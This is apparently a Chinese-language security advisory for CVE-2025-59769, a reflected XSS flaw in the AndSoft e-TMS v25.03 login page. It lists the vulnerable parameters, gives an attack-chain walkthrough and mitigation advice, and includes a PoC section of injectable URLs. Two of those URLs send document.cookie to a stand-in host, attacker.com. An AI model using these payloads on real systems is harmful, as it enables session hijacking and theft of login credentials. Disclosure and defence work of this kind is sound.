CVE-2025-59769：AndSoft e-TMS 反射型跨站脚本漏洞

漏洞信息

漏洞编号

CVE-2025-59769

漏洞类型

反射型跨站脚本（Reflected XSS）

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

AndSoft e-TMS v25.03

漏洞概述

CVE-2025-59769 是 AndSoft 公司开发的 e-TMS（Electronic Transport Management System，电子运输管理系统）v25.03 版本中存在的一个反射型跨站脚本（Reflected XSS）漏洞。该漏洞由西班牙国家网络安全研究所（INCIBE）发现并报告，CVSS 3.1 评分为 6.1，属于中危级别。

AndSoft e-TMS 是一款广泛应用于物流和运输行业的运输管理系统，用于管理订单、车辆调度、运输路线规划等业务。该系统在企业供应链管理中扮演着重要角色，因此其安全性直接关系到企业运营的稳定性和数据安全。

该漏洞存在于 e-TMS 的登录页面 '/clt/LOGINFRM_MOL.ASP' 中，具体涉及多个 URL 参数，包括 'l'、'demo'、'demo2'、'TNTLOGIN'、'UO' 和 'SuppConn'。这些参数在处理用户输入时未能进行充分的过滤和转义，导致攻击者可以通过构造恶意 URL，在受害者的浏览器中执行任意 JavaScript 代码。

由于该漏洞是反射型 XSS，攻击者需要诱导受害者点击特制的恶意链接才能触发攻击。一旦成功利用，攻击者可以窃取用户的会话 Cookie、劫持用户会话、进行钓鱼攻击或在受害者浏览器中执行其他恶意操作。该漏洞的成功利用需要用户交互（UI:R），无需认证（PR:N），可通过网络远程利用（AV:N），对机密性和完整性造成低级别影响。

技术细节

该漏洞是一个典型的反射型跨站脚本（Reflected XSS）漏洞，其根本原因在于 e-TMS v25.03 的登录页面 '/clt/LOGINFRM_MOL.ASP' 在处理多个 URL 参数时，未能对用户输入进行适当的过滤和 HTML 编码转义。

具体而言，受影响的参数包括 'l'、'demo'、'demo2'、'TNTLOGIN'、'UO' 和 'SuppConn'。当用户访问包含这些参数的恶意构造 URL 时，服务器会将这些参数的值直接反射回响应页面中，而没有对其中可能包含的 HTML 标签或 JavaScript 代码进行转义处理。

攻击原理如下：
1. 攻击者构造一个包含恶意 JavaScript 代码的 URL，例如将参数值设置为 '<script>alert(document.cookie)</script>' 或更复杂的载荷；
2. 攻击者通过钓鱼邮件、即时消息或其他社交工程手段诱导受害者点击该恶意链接；
3. 受害者的浏览器向 e-TMS 服务器发送请求，服务器将恶意参数值未经转义地嵌入响应页面中返回；
4. 浏览器解析响应时执行了嵌入的恶意 JavaScript 代码；
5. 恶意代码在受害者的浏览器上下文中执行，可以窃取会话 Cookie、重定向用户到钓鱼页面、修改页面内容或执行其他恶意操作。

由于漏洞位于登录页面，攻击者特别可以利用此漏洞窃取用户的认证凭证或会话令牌，从而获得对 e-TMS 系统的未授权访问权限。由于无需认证即可利用（PR:N），且影响范围包括机密性（C:L）和完整性（I:L），该漏洞对使用 e-TMS 的企业构成一定的安全威胁。

攻击链分析

STEP 1

步骤1：信息收集

攻击者通过 Shodan、Censys 等搜索引擎或直接访问目标网站，识别出目标正在使用 AndSoft e-TMS v25.03 系统，并定位登录页面 /clt/LOGINFRM_MOL.ASP。

STEP 2

步骤2：构造恶意 URL

攻击者构造包含恶意 JavaScript 代码的 URL，利用 'l'、'demo'、'demo2'、'TNTLOGIN'、'UO' 或 'SuppConn' 等参数之一注入 XSS 载荷。

STEP 3

步骤3：社工诱导

攻击者通过钓鱼邮件、即时消息、社交媒体等渠道，向 e-TMS 系统的合法用户发送包含恶意 URL 的链接，诱导用户点击。

STEP 4

步骤4：触发漏洞

受害者点击恶意链接后，浏览器向 e-TMS 服务器发起请求，服务器将未转义的恶意参数值嵌入响应页面返回，浏览器执行其中的 JavaScript 代码。

STEP 5

步骤5：数据窃取与会话劫持

恶意 JavaScript 代码在受害者浏览器上下文中执行，窃取会话 Cookie、认证令牌等敏感信息，发送到攻击者控制的服务器，实现会话劫持。

STEP 6

步骤6：未授权访问

攻击者利用窃取的会话凭证登录 e-TMS 系统，获取运输订单、客户信息等敏感业务数据，或进行其他恶意操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- Reflected XSS PoC for CVE-2025-59769 -->
<!-- Affected endpoint: /clt/LOGINFRM_MOL.ASP -->
<!-- Vulnerable parameters: l, demo, demo2, TNTLOGIN, UO, SuppConn -->

<!-- Basic PoC: Inject script via the 'l' parameter -->
<!-- URL: http://target/clt/LOGINFRM_MOL.ASP?l=<script>alert('XSS')</script> -->

<!-- Cookie stealing PoC using 'demo' parameter -->
<!-- URL: http://target/clt/LOGINFRM_MOL.ASP?demo=<script>document.location='http://attacker.com/steal.php?cookie='+document.cookie</script> -->

<!-- PoC using 'TNTLOGIN' parameter -->
<!-- URL: http://target/clt/LOGINFRM_MOL.ASP?TNTLOGIN="><svg/onload=alert(document.domain)> -->

<!-- PoC using 'UO' parameter with event handler -->
<!-- URL: http://target/clt/LOGINFRM_MOL.ASP?UO=<img src=x onerror=alert('XSS-CVE-2025-59769')> -->

<!-- PoC using 'SuppConn' parameter -->
<!-- URL: http://target/clt/LOGINFRM_MOL.ASP?SuppConn=<body onload=alert(document.cookie)> -->

<!-- PoC using 'demo2' parameter -->
<!-- URL: http://target/clt/LOGINFRM_MOL.ASP?demo2=<script>fetch('http://attacker.com/log?data='+btoa(document.cookie))</script> -->

影响范围

AndSoft e-TMS v25.03

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）对 /clt/LOGINFRM_MOL.ASP 页面实施访问控制，限制仅可信 IP 访问；2）在 Web 服务器或反向代理层面部署 XSS 过滤规则，对请求参数中的特殊字符（如 <、>、"、'、script、onerror 等）进行过滤；3）配置 Web 应用防火墙（WAF）规则，检测和阻断常见的 XSS 攻击模式；4）为登录页面添加 Content Security Policy（CSP）头部，限制内联脚本执行；5）对员工进行安全意识培训，避免点击来源不明的链接；6）监控异常登录行为和可疑的会话活动。